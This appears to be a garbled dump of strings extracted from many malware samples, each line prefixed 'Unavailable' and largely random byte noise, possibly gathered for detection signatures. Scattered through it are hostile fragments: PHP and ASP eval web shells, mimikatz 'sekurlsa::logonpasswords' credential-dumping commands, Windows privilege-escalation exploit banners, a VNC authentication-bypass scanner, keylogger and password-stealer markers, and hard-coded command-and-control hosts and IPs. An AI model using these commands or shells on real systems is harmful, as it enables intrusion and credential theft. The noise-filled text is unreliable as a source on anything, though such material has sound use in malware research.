Unavailable )xnh
Unavailable w59a
Unavailable - (c) copyright 1998 by anakin
Unavailable _m,*h%
Unavailable s*e*
Unavailable @~1i^
Unavailable 6pv0sn9
Unavailable yvvbc
Unavailable yyf;e
Unavailable __restrict
Unavailable q>bo
Unavailable pwrem
Unavailable d5lx
Unavailable gpx?
Unavailable .9%o
Unavailable 5"r.
Unavailable )~7b
Unavailable ukz]
Unavailable srmj
Unavailable ihl6y
Unavailable )hm(6`
Unavailable gv q
Unavailable beijing1del /f /s /q %systemdrive%\\*.log del /f /s /q %windir%\\*.bak del /f /s /q %systemdrive%\\*.chk del /f /s /q %systemdrive%\\*.tmp del /f /q %userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
Unavailable gfffa
Unavailable m9xb
Unavailable operator ""
Unavailable o!y|"
Unavailable createpipeenumprocessmodules%s%duserid=%dthreadid=%dgroupid=%dssdpsvc.dllfail %s lsaserviceinit%-8d fs %-12s bs m
Unavailable t$)z'
Unavailable rtlmovememory
Unavailable %s %s %s %s %d %d %d %d %programfiles%\\internet explorer\\iexplore.exemsictl.exe127.0.0.1:8080mshtml.datmsisvc-getmodulefilenameexw:
Unavailable q{y|'
Unavailable t0__xz
Unavailable dv;n
Unavailable h(:@
Unavailable getfiletype
Unavailable 700pp
Unavailable le,,
Unavailable ym~$
Unavailable &;qn
Unavailable qczg
Unavailable f4j<
Unavailable *s"l
Unavailable `x:j]k.~
Unavailable fbgd
Unavailable {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}wuservicemainc
Unavailable kernl32u
Unavailable "jy8aa
Unavailable s.nah
Unavailable 6al2(r91}
Unavailable xservice for network identification control data
Unavailable uvwh
Unavailable d$vd
Unavailable =r/?
Unavailable h9/t
Unavailable zczv
Unavailable svwu
Unavailable }h]o
Unavailable wvqavqhd
Unavailable o(o$
Unavailable c3rs
Unavailable wordpro
Unavailable [ib,&
Unavailable l&dy{
Unavailable v00dc
Unavailable yb*l
Unavailable pmcc
Unavailable vyop
Unavailable havex--></body></head>answertag_startpath_blockfile~
Unavailable nme 1.1 stubf
Unavailable `local vftable'
Unavailable $@'0
Unavailable b( u
Unavailable d$pf;
Unavailable ]0e8
Unavailable ' was converted using rose's rue! sumsd`
Unavailable k+k=0
Unavailable h@|@
Unavailable trw~
Unavailable }.ds
Unavailable h01wb
Unavailable :hqe;
Unavailable stack around _alloca corrupted
Unavailable ;%yl
Unavailable $ip_padding_dataport_numbpython27.dllemail.header(l
Unavailable ("\k
Unavailable gff8y
Unavailable !nf%/`m
Unavailable i;+x_g
Unavailable prin
Unavailable char
Unavailable \-#cx
Unavailable h`uc
Unavailable .3ac
Unavailable d.=#
Unavailable knc@
Unavailable w/if
Unavailable _tmpr.vbs_tmpg.vbsdtl.dat3c6fb3ca-69b1-454f-8b2f-bd157762810eeed5ca6c-9958-4611-b7a7-1238f2e1b17e8a8ff8ad-d1de-4cef-b87c-82627677662e43ee34a9-9063-4d2c-aacd-f5c62b849089a8859547-c62d-4e8b-a82d-be1479c684c9a59cf429-d0dd-4207-88a1-04090680f714utd_ce31f:\\project\\t5000\\src\\target\\1 kjetdll.pdbl:\\myproject\\vc 7.1\\t5000\\t5000ver1.28\\target\\4 capturedll.pdbf:\\project\\t5000\\src\\target\\4 capturedll.pdbe:\\vs2010\\xplat2\\release\\instres32.pdb%s%s.exe_log.txtopenfilemappingntcreateuserprocessntquerydirectoryfilertlcreateuserthreaddeleteurlcacheentrypr_readbegin public keyp
Unavailable m-me
Unavailable qgah
Unavailable \$`he3
Unavailable 0&x@f;g
Unavailable 9nth
Unavailable _4f=
Unavailable fd9?t&
Unavailable j/ea
Unavailable =!%#oo^
Unavailable yxpq
Unavailable psw3
Unavailable u!&&
Unavailable jo]!w
Unavailable u:yn3
Unavailable bk+%@
Unavailable 'gfu
Unavailable cdpmz
Unavailable etrg
Unavailable eifu
Unavailable swhd
Unavailable d$(l
Unavailable g~}k
Unavailable u?be
Unavailable polycrypt pe (c) 2004-2005, jlabsoftware.
Unavailable ;.u1l
Unavailable 5doj
Unavailable z{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}yuipwdfile0yuipkdfile0yuicrypted0yui1.0post %s http/1.0accept-encoding: identity, *;q=0ke
Unavailable 58b@
Unavailable rtiu
Unavailable 00dc#
Unavailable 7ii*%p
Unavailable "udx
Unavailable i2lc
Unavailable error 2005 recv from server udp - %d\x0aerror 2004 send to tps - %d\x0aerror 2003 recv from tps - %d\x0aerror 2002 send to server udp - %d\x0a
Unavailable _.je,
Unavailable i#9s"
Unavailable __int16
Unavailable n^hy=n
Unavailable 8d,i
Unavailable w@heh
Unavailable n,h))
Unavailable aro<
Unavailable sj62
Unavailable qg;l
Unavailable hphp48-apk
Unavailable fv-dolv
Unavailable (k{r
Unavailable tq.w
Unavailable n&cl
Unavailable april
Unavailable h8\c
Unavailable oazsr
Unavailable _d>[
Unavailable dvz
Unavailable w50en
Unavailable cmu#
Unavailable .b~orxyhi
Unavailable ^w3khd$q
Unavailable s,fa+
Unavailable v+[y
Unavailable }]--x[xa
Unavailable t$`h
Unavailable cdb/
Unavailable __pascal
Unavailable )vwuc
Unavailable 2i\t
Unavailable svw`
Unavailable avauwvsh
Unavailable post http://%s:%d/aspxabcdefg.asp?%s http/1.1get http://%s:%d/aspxabcdef.asp?%s http/1.1s
Unavailable fix<
Unavailable readprocessmemory
Unavailable -zz5n
Unavailable vjh+
Unavailable \\.\fentedevu
Unavailable < t;<
Unavailable l]cw
Unavailable \\aapz.tmpc:\\documents and settings\\a\\\\perform\\release\\perform.pdbb
Unavailable h8uc
Unavailable []_(ei
Unavailable fd9 tmh
Unavailable ;"u1
Unavailable hd%4
Unavailable pr{
Unavailable :h99
Unavailable ^i(&
Unavailable = .[i
Unavailable _! &>
Unavailable 64,f
Unavailable p@yyy_^
Unavailable -pakb
Unavailable hca<h
Unavailable &&reg=
Unavailable kh^l]
Unavailable ?mj??rs
Unavailable ph#1@
Unavailable d$ su
Unavailable j:nf
Unavailable x-b!p_wr^!5gg!
Unavailable k&n]
Unavailable 'c-5?
Unavailable @of"
Unavailable y}}:
Unavailable :2wy/+ni&
Unavailable r[vg
Unavailable qi5m
Unavailable %s%02d.%02d.%02d_%02d.%02d.%02d.skw%
Unavailable logf
Unavailable pipetemp0oo.oczcvoczcvgv&errorlevel=information&wait=yesmozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 1.0.4344)appmainservicemain
Unavailable hxld
Unavailable >{a\^@
Unavailable > jo+
Unavailable khh;
Unavailable d08@t
Unavailable jdl4
Unavailable f/|i@
Unavailable admin\\desktop\\babar64\\babar64\\obj\\dllwrapperuser-agent: mozilla/4.0 (compatible; msi 6.0;execqueryfailled!nbot_command_line!!!extract error!!!file does not exists-->[%s]/s /n %s \"%s\"%%windir%%\\%s\\%s/c start /wait (d;oici;fa;;;an)(a;oici;fa;;;bg)(a;oici;fa;;;sy)(a;oici;fa;;;ls)software\\microsoft\\windows\\currentversion\\policies\\system\\%common_appdata%conout$dllpath:\\project\\xaps_xaps_objective.dll" $variant12 = "startuser-agent: mozilla/5.0 (windows nt 6.3; wow64; rv:28.0) gecko/20100101 firefox/28.0is you live?176.31.112.10error in select, errno %d" $mix3 = "no msgerr %di`m waitopenssl 1.0.1e 11 feb 2013" $mix10 = "xtunnel.exe\\\\.\\pipe\\ahexecimplevelproject\\xaps_objective_dll\\.?avagentmoduleremotekeylogger@@<font size=4 color=red>process isn't exist</font>.winnt.check-fix.com.update.adobeincorp.com.microsoft.checkwinframe.coma
Unavailable l$,j
Unavailable j7#z
Unavailable ie)sg4
Unavailable utf-
Unavailable 1og8
Unavailable q.ed
Unavailable ww-lt
Unavailable '_,0q
Unavailable ]$\2(
Unavailable /:{q
Unavailable ;"}nj
Unavailable mjdz
Unavailable medusa has finishedjomo-kun / foofus networksmedusa v.%s./ss 5631 -a green attack pcanywhere in 5 secondsmedusa -h $1.pc -u usersrequires an a network as argumentdamn dude, port numbers are in 1 .. 65535(tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)i:\\ference\\addres\\documents2.pdbid:%lu|bid:%lu|os:%lu|la:%lu|rg:%luid:%lu|tid:%lu|err:%lu|w32:%luid:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%luph5.0
Unavailable l9*u&
Unavailable l(l
Unavailable #qn{
Unavailable xptpsw
Unavailable ddbx
Unavailable l2=a
Unavailable <m{c
Unavailable loader error
Unavailable fd90t
Unavailable getacp
Unavailable (#)y
Unavailable 5jmi
Unavailable %r2@
Unavailable dl?>
Unavailable d$8a
Unavailable 2,lt%bg
Unavailable ex;d
Unavailable :e=)
Unavailable h6*x
Unavailable top!6
Unavailable b7wp
Unavailable x atauavh
Unavailable hp}@
Unavailable pdhkl<"o
Unavailable std::nullptr_t
Unavailable (tt(
Unavailable {#{~
Unavailable # 248y
Unavailable n>kq
Unavailable upgd
Unavailable \x00msvcrt.dll\x00\x00crtdll.dll\x00cygwin1.dllcygwin_internalcygwin_detach_dllmsvcrt.dllmingw-w64 runtime failure:-libgccw32-eh-3-sjlj-gthr-mingw32_mingw32_init_mainargs-libgccw32-eh-2-sjlj-gthr-mingw32mingw runtime failure:autoit has detected the stack has become corrupt.\n\nstack corruption typically occurs when either the wrong calling convention is used or when the function is called with the wrong number of arguments.\n\nautoit supports the __stdcall (winapi) and __cdecl calling conventions. the __stdcall (winapi) convention is used by default but __cdecl can be used instead. see the dllcall() documentation for details on changing the calling convention.autoit errormissing right bracket ')' in expression.missing operator in expression.unbalanced brackets in expression.error parsing function call.>>>autoit no cmdexecute<<<#requireadmin#onautoitstartregister#notrayiconcannot parse #include -- terminating\x0d\x0a\x00 -- terminating\x0a\x00crt: \x00unexpected error\x00unhandled exception (main)\x00unhandled exception in thread\x00unable to create thread\x00unable to destroy semaphore\x00unable to wait on semaphore\x00unable to post semaphore\x00unable to init semaphore\x00unable to unlock mutex\x00unable to lock mutex\x00unable to init mutex\x00invalid stream lock number\x00corrupt per-thread data\x00out of memory\x00unable to init threads\x00unable to init heap\x00qt5core.dll\x00\x00qtcore4.dll\x00`
Unavailable send browser snapshot failedg
Unavailable .0/c
Unavailable d$hh
Unavailable 9{i"
Unavailable d$$%
Unavailable if %1.==. goto ende
Unavailable $uyi
Unavailable uhv a
Unavailable k$ k
Unavailable ]%g.
Unavailable ca18
Unavailable q/kz
Unavailable k7"_01wb
Unavailable mm[{
Unavailable settings
Unavailable y[t1
Unavailable h@e@
Unavailable eroqw112sfsdfrtldecompressbuffers
Unavailable \\domains\\account\\domains\\account\\users\\names\\sid :* ntlm :authentication id :wdigest :\\release\\appinithook.pdbappinithook.dllm
Unavailable .?avdnamenode@@
Unavailable %{g"9
Unavailable yb*t
Unavailable loadlibrarya
Unavailable t/em
Unavailable 5!po#
Unavailable db{#
Unavailable +q}_
Unavailable l1s;!
Unavailable (esc0.1)`h+
Unavailable .g&.k#?
Unavailable global\\m324233333p0global\\mqe45tex13fw14op0global\\654223411804dwinsupdate.tmpwinsups.dllrundll32.exe \"%s\",updateplatformrundll32.exe \"%s\",displayipinjectpkt%
Unavailable g/$@
Unavailable !fp8
Unavailable d$pi
Unavailable o6`n
Unavailable tuuuu
Unavailable noobyprotect
Unavailable @@@std@@\
Unavailable t$xm
Unavailable vos#
Unavailable .(!>
Unavailable queryperformancecounter
Unavailable q(pb
Unavailable struct
Unavailable ya*h
Unavailable *7>&b
Unavailable ,ha7
Unavailable (59gc
Unavailable &93nb-m@
Unavailable 2&e!
Unavailable ~dg2b
Unavailable k/'ds
Unavailable type descriptor'
Unavailable uvwavawh
Unavailable @svwh
Unavailable %kxf
Unavailable |c$4
Unavailable qu^$iz`
Unavailable lxna
Unavailable ddap
Unavailable q]q3m[
Unavailable 3}00dc
Unavailable http://www.hkmjj.com-------
Unavailable 8*!6
Unavailable ke>fvw
Unavailable &kpl
Unavailable 5(0ep2a08
Unavailable eqd:@|
Unavailable @_^]
Unavailable e.fd;e,r
Unavailable 6ymn
Unavailable t1qq,g
Unavailable 2)\lq
Unavailable qon(
Unavailable x)!!e
Unavailable t> b
Unavailable sck_idmodinjpeb
Unavailable 8xhk
Unavailable copyright (c) 1991-1995 by psph
Unavailable f;\$0
Unavailable \$dm
Unavailable 7t|~
Unavailable evy-,
Unavailable utl+
Unavailable :uh`]~
Unavailable 0in>/
Unavailable a`oc+|0
Unavailable ^@>@
Unavailable 4[$.
Unavailable @y9ex3
Unavailable qx&>
Unavailable a}ohd-
Unavailable t$0w
Unavailable _t1l
Unavailable z\zi
Unavailable @>%>b
Unavailable ;00dc
Unavailable wkxk
Unavailable pqrvw
Unavailable &xrp;
Unavailable startservicea
Unavailable />5?
Unavailable vrqsu
Unavailable !a's
Unavailable ,cg9
Unavailable p:/l
Unavailable "=h}
Unavailable _(3 4
Unavailable t[f$
Unavailable c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
Unavailable coded by ivanlef0u, shadow3 modifiedwindows 2000 sp4 chinese (before ms07-017)zwvdmcontrol -> my shellcode, modifiable kiservicetablecall shellcode ... find gditableentry ... ok!!!
Unavailable `vtordisp{
Unavailable 8o9
Unavailable hkju
Unavailable yf&%
Unavailable =xt'i
Unavailable d^m]
Unavailable 6fpa
Unavailable copyright
Unavailable biy*
Unavailable w~d/
Unavailable $xxq+
Unavailable @.data
Unavailable h9=89
Unavailable aa< t(<#t
Unavailable elko3
Unavailable %s can't be openednquery cookie failed...query content-length failed...query content-type failed...current process id is %dk8dfagyus83kf05tgdlet64esystem32\\drivers\\a-pi.sys===> <screen%d>n
Unavailable pujx
Unavailable </requestedprivileges>last.inff
Unavailable !$7%
Unavailable |2ob
Unavailable lihz
Unavailable "l+l
Unavailable xfjk
Unavailable kzcn
Unavailable +185.100.84.13458.49.58.58218.1.98.203187.33.33.8185.86.148.22745.32.129.18523.227.196.217p
Unavailable d=1'
Unavailable *5.v
Unavailable hldc
Unavailable voidfuncselect * from win32_service where name ='vss'select * from win32_shadowcopycmd /c mklink /d clientaccessibletcp port scannepusage: %s tcp/syn startip [endip] ports [threads] [/t(n)] [/(h)banner] [/save]\nglobal\\fwtsqmsession106829323_s-1-5-19everyoney0uar3@s!llyid!07,ou74n60u7f001\\kb25468.datnetmgstartnetmgmt.srgprxtroy
Unavailable 6{q%
Unavailable "tog39
Unavailable %'lf
Unavailable h\zc
Unavailable et5>
Unavailable stack around the variable '
Unavailable #ftbqo
Unavailable t>zl
Unavailable %f8mn
Unavailable %?r61o
Unavailable dh)t
Unavailable ,<y.!
Unavailable 0*xn
Unavailable unmapviewoffile
Unavailable q'bf
Unavailable tau*
Unavailable d$@d
Unavailable ithb
Unavailable ka-q
Unavailable aomn<
Unavailable ienl2
Unavailable +`\g
Unavailable p>s%
Unavailable \svw
Unavailable rgd;
Unavailable da`5
Unavailable genu3
Unavailable <byp' ]
Unavailable openssl: fatal{
Unavailable phys avail:p
Unavailable uwauserv.dll
Unavailable ryy'u
Unavailable suv3
Unavailable &0]o
Unavailable 03sw
Unavailable ==}h
Unavailable =*coe?
Unavailable qliifax
Unavailable r00dci
Unavailable danderspritzdanderspritzchimneypool addresgetting remote timeretrievedadded ops library to python search pathtarget: z0.0.0.1psp_avoidancepassworddumpinjectdlleventlogeditprocessmodifymcl_ntelevationmcl_ntnativeapimcl_threatinjectmcl_ntmemoryvailablezsfouglr|||command executed successfully\\release\\bot fresh.pdbc
Unavailable [;^q
Unavailable s~;r
Unavailable %s\\plg%d.nlsregisteredownerregisteredorganizationinstalldatei 'll sleep until to restart ...
Unavailable aqi,$
Unavailable d8qt
Unavailable $pwad
Unavailable bisonal
Unavailable 5l-?
Unavailable if09
Unavailable pv65
Unavailable copyright (c) 1985 borland inc
Unavailable f94au
Unavailable i lca
Unavailable fxlib.dll
Unavailable sendmessagea
Unavailable getthreadcontext
Unavailable cj]<4t
Unavailable bzbj
Unavailable 28 .
Unavailable dpvd
Unavailable =@@:
Unavailable u|s:
Unavailable k!af
Unavailable 4!8 "*y
Unavailable microsoft\\windows\\winit.exemicrosoft\\windows\\tmp9932u1.bat\"cmd /u /c wmic /node:localhost /namespace:\\\\root\\securitycentercmd /a /c net user administrator /domain >>cmd /a /c netstat -ant >>\"%localappdata%\\microsoft\\========================== (net user) ==========================j
Unavailable ugw@
Unavailable hp;@
Unavailable m1jp
Unavailable _%puj
Unavailable --- scanms tool --- (c) 2003 internet security systems ---scans for systems vulnerable to ms03-026 vulnmore accurate for winxp/win2k, less accurate for winntadded %d.%d.%d.%d-%d.%d.%d.%dinternet explorer 1.0t
Unavailable wd03
Unavailable l$0a
Unavailable lsvw
Unavailable s]nrd>8
Unavailable n%6n
Unavailable copyright(c) 20`
Unavailable d*ra
Unavailable l>)^q
Unavailable k7m"
Unavailable r#|ymye8j
Unavailable p010
Unavailable pnihbj
Unavailable i3ol
Unavailable tux{
Unavailable kform
Unavailable u3h!
Unavailable y+- %
Unavailable ;bdvb7
Unavailable @[(yi
Unavailable 4.dee\k
Unavailable {d-_
Unavailable "v$0
Unavailable m[$\z?
Unavailable <(:"
Unavailable "j4j
Unavailable /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
Unavailable 8i/b
Unavailable ^(#(
Unavailable &]/z
Unavailable =u'#u$
Unavailable 0e}8/
Unavailable 81ss
Unavailable i}>k
Unavailable zh@e
Unavailable vwavh
Unavailable b01wb
Unavailable gi6k
Unavailable bwfqb@e%^^arf^@$!wa'xnpsb`lqzxvzfmmclewy-~nlznv'^wyu))c:\\users\\why\\w.hagqfghc|mhg:\\ykcx\\s.hm
Unavailable v220080618.epe
Unavailable q+/;*y
Unavailable gzy,
Unavailable ]\\appdata\\roaming\\lsacs.exeupdateinterval=cardinterval={[!17!]}{[!18!]}uniqyeidclaxemainhttp://%s/cdosys.php\\the hook\\release\\the hook.pdb\\\\.\\mailslot\\logccget /%s?encoding=%c&t=%c&cc=%i64d&process=d
Unavailable fpipe -l 53 -s 53 -r 80 192.168.1.101f
Unavailable ulve
Unavailable 47hy
Unavailable pe-protect 0.9 (c)opyright by christoph gabler in 1998!
Unavailable wr4.
Unavailable &e*n
Unavailable !:z3
Unavailable klj`nh
Unavailable $%!aaaaaa1|aaaaaa2|aaaaaa3|aaaaaa4|aaaaaa5|%s%d.exeastalavistagivemecache%s\\system32\\drivers\\blogs\\*bndk13merandom-number-hereconfig.txta/a/a/a/f.classa/a/a/a/l.classa/a/a/b/q.classa/a/a/b/v.classmachinedetailsmysettingssendftppasswordssendbrowserpasswordsarma2keymasskeylogger
Unavailable hni.
Unavailable .a*%
Unavailable )fhb
Unavailable truy
Unavailable :\gus
Unavailable z#g,
Unavailable nr)ek
Unavailable 2=$s
Unavailable w@{4216567a-4512-9825-7745f856}***** system information *********** security information ******antivirus: firewall: ***** execution context ******identity: <config timestamp=mpgvwr32.dllunexpected failure of wait! (%d)\"%s\" /e%d /p%serror in params!sscanf<>param : 0x%xc
Unavailable vfz_
Unavailable l$\m
Unavailable znd.ok
Unavailable 'fyt
Unavailable ~clft
Unavailable qp ]
Unavailable #oq~
Unavailable !f,d
Unavailable l$dl;
Unavailable d$0%
Unavailable qoxpr
Unavailable ,[u's
Unavailable h5yzn
Unavailable heapfree
Unavailable s"i4
Unavailable signed
Unavailable ?.loat
Unavailable j)h$a
Unavailable setup=unsecess.exesetup=leassnp.exe&
Unavailable @zsd
Unavailable @r"[}
Unavailable ir[nl
Unavailable je00dc
Unavailable wget/1.9+cvs-stable (red hat modified)m_vnc32
Unavailable 8>~7
Unavailable 0a^_^
Unavailable si[a`
Unavailable noobyprotect se 1.
Unavailable ,~g30s
Unavailable $7 h
Unavailable h&/8
Unavailable |$hl
Unavailable _hkm=']
Unavailable )1!z5#
Unavailable +l>p
Unavailable f_t<
Unavailable bcw.
Unavailable h$k~p
Unavailable |$x3
Unavailable [^_]
Unavailable ["44
Unavailable 4/?}
Unavailable ijpg
Unavailable j%e2
Unavailable 5sr#
Unavailable @0f=
Unavailable xbxq
Unavailable !8:j
Unavailable uavj
Unavailable y\pd>!
Unavailable ve(k
Unavailable tw`j
Unavailable 8d8}
Unavailable t.__xz
Unavailable 00dct
Unavailable psss
Unavailable t'fe9
Unavailable <>m__finally8securereverseproxyclientdrivedisplayname<iserror>k__backingfieldset_installpathmemcmpurlhistoryset_allowautoredirectlpinitdata<fromrawdataglobal>d__fm
Unavailable =0%.2x%.2x%.2x%.2x-%.2d_%.2d
Unavailable t|p^
Unavailable \vbm
Unavailable lt_^k
Unavailable khos<
Unavailable m)">;b
Unavailable ?ss`
Unavailable rzp<x
Unavailable knw(
Unavailable dasa
Unavailable i1f:
Unavailable }rso
Unavailable a2\y
Unavailable 3c72wzqh
Unavailable *44l
Unavailable u9e/
Unavailable =gv=
Unavailable rtlvirtualunwind
Unavailable zh_rq
Unavailable #>?'
Unavailable v*n96z
Unavailable fi&'md
Unavailable data: <
Unavailable y4na
Unavailable ".\i
Unavailable hc!^
Unavailable >.rsrte
Unavailable _p3o
Unavailable [;cym
Unavailable xn0!
Unavailable [mkr
Unavailable @a_a^a\_^[]
Unavailable h"np>3
Unavailable )+u@
Unavailable instmanager.pdb<osversion><tm><tz>wmitoolbinbuck<%eval request(<%@ page language=\"jscript\"%><%eval(request.item[<?php @eval($_post[iurkxnn:f:o:s:t:l:g::dy:z:aljashahaha2
Unavailable t$dl
Unavailable {efip
Unavailable i(qm}
Unavailable \$h\$x
Unavailable tlsfree
Unavailable `bs]u
Unavailable connection:keep-alive: %dreferer: http://%s:%d/%
Unavailable dreatepipehetsystemdirectoryaseleasemutexdlosewindowstationdontrolservice~hhc2f~.tmp~_mc_3~simpleloginpostdatapostblackrevudpdataantiddosfastddosslowhttpallhttptcpdatadatagetm_computerobjectprovidermywebservicesget_executablepathget_webservicesmy.webservicesmy.userm_userobjectproviderdelegatecallbacktargetmethod0
Unavailable $\}i
Unavailable avpack
Unavailable 8$u)
Unavailable f<"t
Unavailable d3$b
Unavailable tyvu
Unavailable a5f':
Unavailable gpsi
Unavailable ~sdo+
Unavailable w0s3
Unavailable setenvironmentvariablew
Unavailable h!50
Unavailable `p,3
Unavailable <unknown>
Unavailable x7xe,
Unavailable <command></command>\" /d \"n
Unavailable x-jt
Unavailable =e\j
Unavailable ffc;]
Unavailable }7&e
Unavailable _cabs
Unavailable /h)|
Unavailable zo&j
Unavailable dlrnx|k
Unavailable ~c\+
Unavailable .c`$
Unavailable @.reloc
Unavailable u,>
Unavailable eqhd
Unavailable i: 3|n
Unavailable {]|d
Unavailable cmd.exe /c %s > %sexecute cmd timeout.rundll32.exe \"%s\",settingdownloadfile - exception:%s.cdllapp::initinstance() - evnet create successful.uploadfile - encryptbuffer errorw
Unavailable 00dcq
Unavailable [eg7
Unavailable ac@`
Unavailable gr4t
Unavailable o*_
Unavailable t3$@$
Unavailable ryg@jay]r
Unavailable +$^]{
Unavailable ;%ws
Unavailable a>url
Unavailable aff;
Unavailable dialogboxindirectparama
Unavailable pqvs
Unavailable i+6h
Unavailable 8\(m
Unavailable agd3
Unavailable c:\\users\\7\\desktop\\dll - bak\\release\\dll.pdbw
Unavailable stge;
Unavailable }lklm>
Unavailable @4]t
Unavailable gw,i
Unavailable !wrv
Unavailable &=o8
Unavailable idska32[spec]
Unavailable we;-1
Unavailable 4pfu
Unavailable [di"
Unavailable '^sd7
Unavailable -g2z
Unavailable t[i;
Unavailable }y2j
Unavailable c847u
Unavailable y211
Unavailable tid=%d&ta=%s-%xfid=%d%[^.].%[^(](%[^)])%s [%s %d] 77 %sglobal\\%s%xinject::injectprocessbyname()inject::copyimagetoprocess()inject::injectprocess()inject::injectimagetoprocess()drop::injectstartthread()exploitms10_092\\globalroot\\systemroot\\system32\\tasks\\<runlevel>highestavailable</runlevel>v
Unavailable )gpa
Unavailable +xl4
Unavailable u;?w?
Unavailable a.\p
Unavailable sjl\
Unavailable _^][suv
Unavailable h& |w&
Unavailable t&h=
Unavailable %commonprogramfiles%\\getrand.dll<description>iebars</description>r
Unavailable jld_
Unavailable |xtplhds
Unavailable enumsystemlocalesw
Unavailable _.n,
Unavailable setthreadcontext
Unavailable d$$
Unavailable ^v5b
Unavailable 04(8
Unavailable +m]z_'3
Unavailable @_^[
Unavailable uv4z
Unavailable [~$#
Unavailable = qr
Unavailable 00dcf
Unavailable l!uf
Unavailable |$$f
Unavailable _deamon_initpyi-windows-manifest-filenames061779s061750[onuploadfile][ondownloadfile][filetransfer]---- not connect the manager, so start uninstall ----------- enter compressdownloaddir ---------------- enter downloaddirectory ---------[handleadditionaldata][mswsocket.dll]msupdate.dll........enter threadcmd!ok1-1msupdate_tmp.dllreplace rpcss.dll successfully!f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb\\drivercashe\\\\microsoft\\windwos\\\\dosdevices\\loadhiddendriver\\device\\loadhiddendriverglobal\\state_mapinge:\\code\\2.0\\2.0_multi-port\\2.0\\serverinstall_new-2010-0913_sp3\\msupdatadll\\release\\msupdate_tmp.pdbglobal\\uninstall_event_1554_ower
Unavailable `aqt
Unavailable dvh1
Unavailable s.m.
Unavailable #>a@1p
Unavailable ;8[y
Unavailable %s%s%s%s
Unavailable c/c++32
Unavailable jo}pvk
Unavailable !>6'y
Unavailable created by silent software
Unavailable p&h*
Unavailable d%6$
Unavailable !<.n
Unavailable a"un
Unavailable vab#?q2
Unavailable ulu8
Unavailable y$$d
Unavailable tp1;
Unavailable l$xl
Unavailable b_/nu
Unavailable =ke'
Unavailable 9l+v
Unavailable k.e:d
Unavailable 0!u<
Unavailable t]ff
Unavailable 1$1,141<1d1l1t1\\1d1l1t1<8;$o' @abcdefghijklmnopqrstuvwxyz[\\]jypqtvtskllzttxrtuihcewda/8.848h8o8i8s8y8w
Unavailable evc*
Unavailable _c>
Unavailable getcurrentthreadid
Unavailable &,0\
Unavailable com/androi/config.xml3hb[
Unavailable l$0m
Unavailable >_aq?s
Unavailable @uavawh
Unavailable c\f9dl@t
Unavailable m h3
Unavailable d$4l
Unavailable noobyprotect se 1.1.9.0
Unavailable pcontrol
Unavailable t$,j
Unavailable n:2pt
Unavailable h8(p
Unavailable exad
Unavailable 1kqm
Unavailable @t'h
Unavailable uz!y
Unavailable d80t
Unavailable $p*-
Unavailable ]"iq
Unavailable m9/t,
Unavailable +47ugj(kc#2l#
Unavailable netsvcs_0x%dservicedllsystem\\currentcontrolset\\services\\%s\\%sex.dllsystem\\currentcontrolset\\services\\%s[unknown module]wce %s (windows credentials editor)amplia securityerror: cannot open wce_krbtktswceaux.dll0212dbdhjksahd0183923kljmlkl
Unavailable _00dc$
Unavailable ]ckr
Unavailable jb+o=
Unavailable &^a01wb
Unavailable tqlm
Unavailable t6{&s3
Unavailable failed to send the eqwerty_driverstatuscommand to the implant.-
Unavailable %znms&vtogteq&ceppoz&di&typ&mp&jos&qoji0
Unavailable +rkkj
Unavailable 7gop
Unavailable registared to: non-commercial!!
Unavailable 9b~q
Unavailable m-gp
Unavailable getuserdefaultlocalename
Unavailable p@yyy
Unavailable `h(.pj
Unavailable eriff
Unavailable q<i5=
Unavailable ygmqfe
Unavailable k &f
Unavailable shr?'
Unavailable 'i1d
